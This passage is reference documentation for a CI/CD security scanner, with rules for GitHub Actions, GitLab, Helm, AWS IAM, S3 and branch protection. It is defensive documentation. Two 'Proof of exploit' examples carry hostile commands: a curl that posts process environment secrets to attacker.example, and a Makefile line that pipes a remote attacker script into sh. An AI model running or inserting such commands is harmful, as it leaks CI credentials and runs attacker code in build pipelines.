Source: GHA-003 in the GitHub Actions provider.
GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.
Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.
Source: GHA-004 in the GitHub Actions provider.
GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.
Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- LocalStack and Moto integration tests set
AWS_ENDPOINT_URLto a localhost address and use the sentineltest/testaccess keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.
Source: GHA-005 in the GitHub Actions provider.
GHA-006: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognizes cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools.
Recommendation. Add a signing step, e.g. sigstore/cosign-installer followed by cosign sign, or slsa-framework/slsa-github-generator for keyless SLSA provenance. Publish the signature alongside the artifact and verify it at consumption time.
Seen in the wild.
- SolarWinds Orion compromise (December 2020): SUNBURST trojanized builds shipped to ~18,000 customers because no post-build signature could be checked against a trusted signing identity. Cryptographic signing on every release would have given downstream consumers a verifiable break with the upstream key, the absence of which was the ambient signal of compromise.
- PyTorch nightly compromise (December 2022): the
torchtritondependency was hijacked via PyPI dependency-confusion. Sigstore-style attestation tied to the official publisher would have made the impostor build fail verification rather than silently install.
Source: GHA-006 in the GitHub Actions provider.
GHA-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.
Recommendation. Add an SBOM generation step, anchore/sbom-action, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the release so consumers can ingest it into their vuln-management pipeline.
Source: GHA-007 in the GitHub Actions provider.
GHA-040: Action reference matches a known-compromised SHA or tag CRITICAL
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Walks every workflow's steps[].uses: and jobs.<id>.uses: references against the curated compromised-action registry in pipeline_check.core.checks.github._compromised_actions. Match is case-insensitive on owner / repo and exact on the ref value (commit SHA or tag name). Registry is deliberately small and append-only — refresh by PR with the citing advisory in the commit message; no fetch-from-network registry to avoid taking on a telemetry surface.
Recommendation. Rotate every secret that may have been reachable to a workflow run that hit the compromised reference, then update the uses: reference to a known-clean SHA published by the upstream maintainer post-incident (usually announced in the advisory body). Audit CI logs for the affected window for any sign that the malicious payload ran against this repo.
Known false positives.
- The registry covers only public, advisory-confirmed compromises. Pre-disclosure compromises and yet-unpublished maintainer-account takeovers do not land until the citing CVE / GHSA exists. Pair with GHA-001 (SHA pinning) and GHA-025 (tag-rewrite detection) for the prevention angle.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): the canonical case the registry was built for. Roughly 23,000 tag-pinned repos shipped CI secrets to an exfiltration endpoint over a ~24-hour window before GitHub blocked the malicious commits.
- reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week as tj-actions; smaller blast radius but identical mechanism. Tag-pinned consumers were affected; SHA-pinned consumers who happened to match the malicious commit were also affected.
Proof of exploit.
Vulnerable: pinned to a SHA the attacker landed under @v45.
Same applies to tag pins that resolved to the malicious
commit during the compromise window:
- uses: tj-actions/changed-files@v45 # WAS pointing at the bad commit
Attack: the action body exfiltrated CI secrets to a
Memdump-style endpoint:
# curl -X POST https://attacker.example/exfil \
-d "$(cat /proc/self/environ)"
Every workflow run that hit one of those refs over the
~24-hour exposure window leaked the entire env block,
including ${{ secrets.* }} and GITHUB_TOKEN.
Safe: pin to the post-incident clean SHA the maintainer
published in the advisory:
- uses: tj-actions/changed-files@a284dc1 # v45.0.0 (clean)
Source: GHA-040 in the GitHub Actions provider.
GHA-041: Action upstream repo has a single contributor MEDIUM
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads the contributor count from ctx.action_metadata[owner/repo].contributor_count (populated by the --resolve-remote path; the GitHub REST /contributors endpoint, capped at two entries — the rule only cares about == 1). When the fetch failed or the flag is off, the rule passes silently. Forks and archived repos that ALSO have a single contributor fire the rule; the fork / archived state is part of the same supply-chain risk story.
Recommendation. Audit the action repo's contributor list. If the repo genuinely has one maintainer, pin to a vendored fork under your org's control (so a future compromise on the upstream doesn't reach your build runtime) or move to a first-party action covering the same surface. The single-maintainer pattern is what made tj-actions / reviewdog one-day compromises so widely-blast.
Known false positives.
- Some well-maintained single-author actions (high-quality personal-account repos that the maintainer simply hasn't open-sourced governance for) are not actually compromised. Suppress via ignore-file when a security review has confirmed the maintainer's identity and 2FA posture.
Seen in the wild.
- tj-actions / reviewdog March 2025 compromises (CVE-2025-30066 / CVE-2025-30154): both upstream repos had a single primary contributor at the time of compromise. The single-maintainer pattern was central to the blast radius (no second pair of eyes on the malicious commit, no auto-rollback when the tag move landed).
Source: GHA-041 in the GitHub Actions provider.
GHA-042: Action upstream repo is newly created MEDIUM
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads created_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path). Fires when the repo's age in days is below MIN_AGE_DAYS (90). Without the opt-in flag the rule passes silently with a nudge.
Recommendation. Verify the action repo is the real upstream and not a typosquat. Compare the spelling and owner against the intended action (actions/checkout vs actoins/checkout); check the repo description, stars, and prior releases. If the action is genuinely new but trusted, suppress via ignore-file with a dated note; the suppression decays naturally as the repo ages past the 90-day threshold.
Known false positives.
- Newly-released first-party actions from a trusted org (say, a freshly-launched
actions/foorolled out by GitHub itself) fire while they're still young. Suppress via ignore-file with a dated note; the entry expires naturally once the repo crosses the age threshold.
Seen in the wild.
- GitGuardian / StepSecurity typosquat reports (2023-2024) document several action-naming impersonations that appeared as newly-registered repos and reached production CI before the legitimate owner was notified.
Source: GHA-042 in the GitHub Actions provider.
GHA-043: Low-star action runs with sensitive permissions HIGH
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads stargazers_count from ctx.action_metadata[owner/repo] and the effective permissions: block (job-level wins; falls back to workflow-top-level; falls back to the caller's inherited block for resolved reusable workflows). Fires when stars < MAX_STARS (25) AND any of 'contents', 'packages', 'id-token', 'actions', 'deployments' is set to write on the calling job. permissions: write-all is treated as all scopes set to write.
Recommendation. Either narrow the calling job's permissions: to the minimum the action actually needs (drop contents: write / id-token: write / packages: write / actions: write / deployments: write unless the action's documented surface requires them), or replace the action with a community-reviewed alternative. The rule fires the COMBINATION of low community review and elevated permissions; either side alone is fine.
Known false positives.
- Internal first-party actions hosted in a private org repo legitimately have low public star counts; their threat model is different and the rule does not distinguish internal from third-party. Suppress via ignore-file when the action is in-org and trusted.
Seen in the wild.
- GitGuardian 2023 supply-chain audit: a handful of low-popularity actions with
contents: writewere weaponized via single-PR maintainer-impersonation compromises; the elevated permission was the privilege amplifier that let the attacker push code back to the victim's default branch on the same workflow run.
Source: GHA-043 in the GitHub Actions provider.
GHA-047: Action ref resolves to a recently committed tag or SHA MEDIUM
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads ref_committed_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path via GET /repos/{owner}/{repo}/commits/{ref}). Fires when the referenced ref's commit date is younger than MIN_REF_AGE_DAYS (7). Trusted publishers (actions, aws-actions, azure, ...) are skipped by default to avoid firing on legitimate retags of floating majors; pin to a SHA to opt those back in. Without --resolve-remote the rule passes silently with a discovery nudge.
Recommendation. Wait until the referenced tag or commit has had time to be reviewed by the upstream community before pulling it into CI. The default cooldown is seven days. Either bump the pinned ref to an older release, or wait 7 days and re-run. If the action is internal / first-party and the freshness gate is unwanted, pin to a 40-char commit SHA — SHA pins don't move under a retag and are the preferred long-term mitigation.
Known false positives.
- A legitimate first-party action that's outside the default trusted-publisher allowlist (a small vendor org that publishes a real action; you'd like it included) will fire after every release for the cooldown window. Either pin to a SHA (preferred) or suppress via ignore-file with a dated note; the suppression decays once the ref ages past the threshold.
Seen in the wild.
- Multiple action-tag compromises (ua-parser-js npm 2021, tj-actions/changed-files 2024) followed the same shape: a tag was re-pointed at a malicious commit and consumers pulling on the next CI run executed the payload. Cooldown gating turns the community-detection window into a defense.
Source: GHA-047 in the GitHub Actions provider.
GL-001: Image not pinned to specific version or digest HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-001 in the GitLab CI provider.
GL-002: Script injection via untrusted commit/MR context HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.
Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
Source: GL-002 in the GitLab CI provider.
GL-003: Variables contain literal secret values CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.
Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
Source: GL-003 in the GitLab CI provider.
GL-004: Deploy job lacks manual approval or environment gate MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.
Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
Source: GL-004 in the GitLab CI provider.
GL-005: include: pulls remote / project without pinned ref HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.
Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
Source: GL-005 in the GitLab CI provider.
GL-006: Artifacts not signed MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts can't be verified downstream, so a tampered build is indistinguishable from a legitimate one. Pass when any of cosign / sigstore / slsa-* / notation-sign appears in the pipeline text.
Recommendation. Add a job that runs cosign sign (keyless OIDC with GitLab's id_tokens works out of the box) or notation sign. Publish the signature next to the artifact and verify it on consume.
Source: GL-006 in the GitLab CI provider.
GL-007: SBOM not produced MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / spdx-sbom-generator / sbom-tool / Trivy-SBOM appears in the pipeline body.
Recommendation. Add an SBOM step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or GitLab's built-in CycloneDX dependency-scanning template. Attach the SBOM as a pipeline artifact.
Source: GL-007 in the GitLab CI provider.
HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.
Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-001 in the Helm provider.
HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified, 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Three failure shapes:
Chart.yamldeclares dependencies but noChart.lockexists at all.Chart.lockexists but itsdependencies:list is missing entries declared inChart.yaml(drift after an edit without re-runninghelm dependency update).Chart.locklists every dependency but one or more entries lack adigest:field (lock generated by an old Helm 3 version that didn't always populate it).
v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.
Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download, without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts with no dependencies (the
dependencies:key is absent or empty) pass automatically. There is nothing to lock.
Source: HELM-002 in the Helm provider.
HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:
https://, chart-museum / OSS chart repos. The default for public Helm charts.oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.file://, in-repo dependency. No network surface.@alias, local alias for a previously registeredhelm repo addURL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's~/.config/helm/repositories.yaml).
Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-003 in the Helm provider.
HELM-004: Chart dependency version is a range, not an exact pin MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives, a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.
Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.
Source: HELM-004 in the Helm provider.
HELM-005: Chart maintainers field empty or missing chain-of-custody info LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An maintainers: entry is considered usable when the value is a YAML mapping with name: set to a non-empty string and at least one of email: / url: populated. Entries that look like - name: TODO or carry blank contact fields fail the rule the same way a missing block does, the field exists but doesn't carry a real chain-of-custody signal.
Recommendation. Populate maintainers: in Chart.yaml with at least one entry carrying a name plus either an email or a url. The name is the human a downstream consumer files an issue against; the contact field is the channel they reach. Charts published to ArtifactHub or an internal registry without this field are silently anonymous, fine for a personal scratch chart, not for one your CI pipeline will deploy to production.
Known false positives.
- Library charts (
Chart.yamltype: library) often ship without maintainers when distributed inside a single team's monorepo where the org-level CODEOWNERS already names the contact. Suppress with--ignore-filewhen this matches your situation.
Source: HELM-005 in the Helm provider.
HELM-006: Chart.yaml does not declare a kubeVersion compatibility range LOW
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. The field is a string carrying a Helm-flavoured SemVer range. Empty / missing fails the rule. Whitespace-only values fail too, an obviously-blank key should not satisfy a posture check.
Recommendation. Add a kubeVersion: SemVer range to Chart.yaml covering the Kubernetes versions you've actually rendered and tested the chart against. >= 1.25.0 < 1.32.0 is the common shape for a chart maintained against the upstream support window. Helm will refuse helm install against a cluster whose kubectl version falls outside the range, catching silent-breakage surprises (removed apiVersions, renamed RBAC verbs, alpha features) at pre-flight rather than at runtime.
Known false positives.
- Library charts (
Chart.yamltype: library) that wrap version-agnostic helpers often legitimately ship withoutkubeVersion. Suppress with--ignore-filewhen the chart genuinely targets every supported Kubernetes minor.
Source: HELM-006 in the Helm provider.
HELM-007: Chart.yaml description field is empty or missing LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Walks Chart.yaml description: and fires when the field is missing, None, or a string that's empty after stripping whitespace. The Helm chart spec doesn't enforce the field but every chart published to ArtifactHub or the upstream stable repo populates it; production charts that ship without it are usually a copy-paste-from-template oversight.
Recommendation. Set description: in Chart.yaml to a one-sentence summary of what the chart deploys (e.g. description: Postgres 14 cluster with WAL-G backups and a Prometheus exporter). Helm registries display this string in chart listings; without it, anyone browsing has to read the README to figure out what the chart does.
Source: HELM-007 in the Helm provider.
HELM-008: Chart.lock generated more than 90 days ago MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without Chart.lock are skipped. HELM-002 covers the missing-lock case directly. Charts whose generated: field is malformed or absent silently pass on this rule (HELM-002 covers the absent-lock case from a different angle).
Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.
Known false positives.
- A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with
--ignore-filewhen this matches your situation.
Source: HELM-008 in the Helm provider.
HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.
Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted, production charts shouldn't ship references to a developer-local endpoint anyway.
Source: HELM-009 in the Helm provider.
HELM-010: Chart.yaml appVersion field is empty or missing LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Library charts (Chart.yaml type: library) legitimately don't have an appVersion because they package no application. Those are exempted. For application charts (type: application, the default), appVersion is required for CVE tracking and release-tracking; without it, helm list shows - in the AppVersion column and downstream consumers have no signal.
Recommendation. Set appVersion: in Chart.yaml to the version of the application the chart packages (e.g. appVersion: "17.2" for a Postgres-17.2 chart at version: 1.4.2). When the upstream application releases, bump appVersion and re-cut the chart. Helm's CLI displays appVersion alongside the chart version in helm list, so downstream operators can see which app version is running where.
Source: HELM-010 in the Helm provider.
IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.
Recommendation. Replace AdministratorAccess with least-privilege policies.
Source: IAM-001 in the AWS provider.
IAM-002: CI/CD role has wildcard Action in attached policy HIGH
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.
Recommendation. Replace wildcard actions with specific IAM actions.
Source: IAM-002 in the AWS provider.
IAM-003: CI/CD role has no permission boundary MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.
Recommendation. Attach a permissions boundary defining max permissions.
Source: IAM-003 in the AWS provider.
IAM-004: CI/CD role can PassRole to any role HIGH
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.
Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
Source: IAM-004 in the AWS provider.
IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens), 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.
Recommendation. Add a Condition requiring sts:ExternalId for external principals.
Source: IAM-005 in the AWS provider.
IAM-006: Sensitive actions granted with wildcard Resource MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).
Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).
Source: IAM-006 in the AWS provider.
PBAC-001: CodeBuild project has no VPC configuration HIGH
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space, egress to the public internet is unrestricted, every package registry / CDN / arbitrary endpoint is reachable. Inside a VPC, security-group + VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.
Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.
Source: PBAC-001 in the AWS provider.
PBAC-002: CodeBuild service role shared across multiple projects MEDIUM
Evidences: 2.2.2 Ensure build workers are single-use, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius, a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.
Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.
Source: PBAC-002 in the AWS provider.
S3-001: Artifact bucket public access block not fully enabled CRITICAL
Evidences: 4.2.1 Ensure access to artifacts is limited.
How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.
Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
Source: S3-001 in the AWS provider.
S3-002: Artifact bucket server-side encryption not configured HIGH
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Default bucket encryption applies SSE-S3 (AES256) to every PutObject. As of January 2023, AWS enables this on all new buckets automatically, but existing buckets created before then can still be unencrypted unless explicitly configured. Without it, individual objects can be uploaded without encryption (the client gets to choose).
Recommendation. Enable default bucket encryption using at minimum AES256 (SSE-S3). For stronger key control, use SSE-KMS with a customer-managed key.
Source: S3-002 in the AWS provider.
S3-003: Artifact bucket versioning not enabled MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable, the original bytes are gone.
Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.
Source: S3-003 in the AWS provider.
S3-004: Artifact bucket access logging not enabled LOW
Evidences: 2.3.7 Ensure pipeline steps produce audit logs, 5.2.3 Ensure deployment environment activity is audited.
How this is detected. S3 server access logging records every API operation against the bucket, who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.
Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.
Source: S3-004 in the AWS provider.
S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM
Evidences: 4.2.1 Ensure access to artifacts is limited.
How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or a SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.
Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.
Source: S3-005 in the AWS provider.
SCM-001: Default branch has no protection rule HIGH
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Without a branch protection rule on the default branch, anyone with write access can force-push, delete the branch, or merge directly without review. Even when CI runs on the branch, an unprotected default branch lets a single compromised maintainer rewrite history and erase the audit trail. The check is sourced from the GitHub REST API (GET /repos/{owner}/{repo}/branches/{branch}/protection); a 404 response is itself the failure signal.
Recommendation. Add a branch protection rule on the default branch in the repository's Settings -> Branches. At minimum require pull request reviews before merging, require status checks to pass, and disable force-pushes / deletions. Match the rule to OpenSSF Scorecard's Branch-Protection thresholds for the organization's compliance baseline.
Seen in the wild.
- Numerous post-incident reports (PyPI / RubyGems package compromises 2018-2024) trace the initial maintainer-account takeover step to the absence of branch protection: the attacker pushed a single tampered commit to the default branch, the release pipeline ran on push, the malicious build shipped to the registry within minutes, and recovery required force-pushing the audit trail itself. Branch protection turns the entire class of attack into a review-then-merge gate.
Proof of exploit.
With no protection rule on main, a single compromised
maintainer credential is enough to ship a tampered build:
git checkout main
echo 'curl https://attacker/c2 | sh' >> Makefile
git commit -am 'fix: tweak'
git push origin main # no review required
# CI now runs the tampered build with full secret access.
Recovery needs force-push to rewrite the trail:
git push --force origin main # also unprotected
A protection rule with required_pull_request_reviews set
and allow_force_pushes: false blocks both the push and
the rewrite without giving up an inch of velocity.
Source: SCM-001 in the SCM provider.
SCM-002: Default branch protection does not require pull request reviews HIGH
